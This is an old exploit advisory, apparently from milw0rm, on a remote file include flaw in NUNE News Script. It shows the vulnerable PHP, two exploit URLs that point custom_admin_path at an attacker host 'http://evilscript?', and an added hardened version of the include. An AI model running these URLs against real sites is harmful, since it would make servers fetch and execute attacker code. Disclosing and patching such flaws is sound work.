SECURITYVULNS:DOC:15636
Jan 09, 2007 - 12:00 a.m.

NUNE News Script (custom_admin_path) Remote File Include Vulnerability



Author: xoron


Code:

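// $custom_admin_path is used as-is when set; nothing validates it
if (isset($custom_admin_path))
    $special_admin_path = $custom_admin_path;
else
    $special_admin_path = "news/admin";

// the unvalidated value becomes the prefix of the path passed to require()
require("$special_admin_path/config/nune.conf.php");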


3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?
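
Hardened form of the include shown under "Code:", as an added example that is not NUNE project code and not part of the original advisory. The names nune_admin_config(), NUNE_ALLOWED_ADMIN_PATHS and NUNE_ADMIN_PATH, and the second allow-list entry, are hypothetical.

```php
<?php
// Added example (not NUNE code): resolve the admin path without trusting
// request input. All names below are hypothetical.

// Fixed allow-list of admin directories, relative to the application root.
const NUNE_ALLOWED_ADMIN_PATHS = ['news/admin', 'admin'];

function nune_admin_config(string $appRoot, ?string $requested): string
{
    // Fall back to the script's own default when nothing is configured.
    $relative = $requested ?? 'news/admin';

    // An exact allow-list match rejects URLs (http://, ftp://), stream
    // wrappers (php://, data:) and ../ traversal in one step.
    if (!in_array($relative, NUNE_ALLOWED_ADMIN_PATHS, true)) {
        throw new InvalidArgumentException('admin path not allowed');
    }

    // realpath() resolves local files only; then confirm the result is
    // still under the application root (covers symlinked directories).
    $root = realpath($appRoot);
    $file = realpath("$appRoot/$relative/config/nune.conf.php");
    if ($root === false || $file === false) {
        throw new RuntimeException('admin config not found');
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('admin config outside application root');
    }
    return $file;
}

// The path comes from deployment configuration (a constant defined by the
// including script), never from $_GET, $_POST or $_COOKIE.
$configured = defined('NUNE_ADMIN_PATH') ? NUNE_ADMIN_PATH : null;
try {
    require nune_admin_config(__DIR__, $configured);
} catch (Exception $e) {
    http_response_code(500);
    exit('configuration error');
}
```

Independently of the code change, keeping allow_url_include disabled in php.ini stops require() from loading http:// paths at all.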


download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz


Greetz: str0ke, kacper, GODAttach

Farewell to nukedx, take care of yourself, my friend…!


milw0rm.com [2007-01-06]